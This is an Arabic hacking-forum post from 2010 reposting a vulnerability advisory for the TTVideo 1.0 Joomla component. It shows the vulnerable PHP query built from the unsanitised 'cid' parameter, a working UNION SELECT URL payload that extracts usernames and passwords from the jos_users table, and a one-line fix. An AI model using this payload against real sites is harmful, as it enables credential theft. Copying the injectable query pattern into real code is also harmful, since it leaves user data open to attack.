التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات
تحديث الصفحة √مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--
التعليمات التقويم مشاركات اليوم البحث

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
السابق المشاركة السابقة   المشاركة التالية التالي
قديم 08-05-2010, 08:21 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية عبد الله ر
 

 
 
إحصائية العضو







عبد الله ر غير متواجد حالياً

إرسال رسالة عبر MSN إلى عبد الله ر

 

 

إحصائية الترشيح

عدد النقاط : 10
عبد الله ر is on a distinguished road
افتراضي

كود PHP:
TTVideo 1.0 Joomla Component SQL Injection Vulnerability
Download linkhttp://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/
 Name              TTVideo Vendor            http://www.toughtomato.com Versions Affected 1.0
 Author            Salvatore Fresta aka Drosophila Website           http://www.salvatorefresta.net Contact           salvatorefresta [at] gmail [dot] com Date              2010-07-27
XINDEX
 I.    ABOUT THE APPLICATION II.   DESCRIPTION III.  ANALYSIS IV.   SAMPLE CODE V.    FIX
IABOUT THE APPLICATION________________________
TTVideo  is  a  Joomla!  component that makes use of thepopular  video  sharing  site  Vimeo  to  create a videolibrary.
IIDESCRIPTION_______________
A  parameter  in  ttvideo.php  is not properly sanitisedbefore being used in a SQL query.
IIIANALYSIS_____________
Summary:
 ASQL Injection
ASQL Injection________________
The parameter cid passed to ttvideo.php when task is setto video  is not properly sanitised before being used ina SQL query.  This  can  be  exploited to manipulate SQLqueries by injecting arbitrary SQL code.  The  followingis the vulnerable code:
ttvideoController.php (line 40):
function video() {    $cid JRequest::getVar('cid'null'default');
ttvideo.php (line 188):
function getVideo($id) {    $db $this->getDBO();    $db->setQuery("SELECT * from #__ttvideo WHERE id=$id");    $video $db->loadObject();     if ($video === null)      JError::raiseError(500'Video with ID: '.$id.' not found.');    return $video;}IVSAMPLE CODE_______________
ASQL Injection
http://site/path/index.php?option=com_ttvideo&task=video&cid=-1  UNION SELECT  1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17  FROM jos_users
VFIX______
Use JRequest::getInt instead of JRequest::getVar 
التوقيع

سبحان الله وبحمده سبحان الله العظيم
في الطريق الى الاحتراف
باذن الله
أن تكون سوريا" يعني أن تكون أسدا" تحيط به الضباع

 

   

رد مع اقتباس
 

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ترتيب الخطوات في حقن قواعد البيانات SQL Injection KaLa$nikoV SQL قواعد البيانات 127 05-03-2017 08:12 PM
جميع ادوات حقن قواعد البيانات -Sql injection- {قأبل للتحديث} Master vbspiders SQL قواعد البيانات 280 08-24-2015 04:10 AM
Thumbs up into_outfile in SQL Injection شرح طريقة رفع شل عن طريق ثغرات SQL Injection Black-FoG SQL قواعد البيانات 73 03-14-2014 09:08 PM
[Style] : ¨°•√♥ كل عام وانتم بخير العيدية استايل العيد الازرق الاحترافي من سنبوك لتصميم ♥√•°¨ support قسم ستآيلات الـ vB 0 09-18-2009 11:52 PM


الساعة الآن 09:39 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0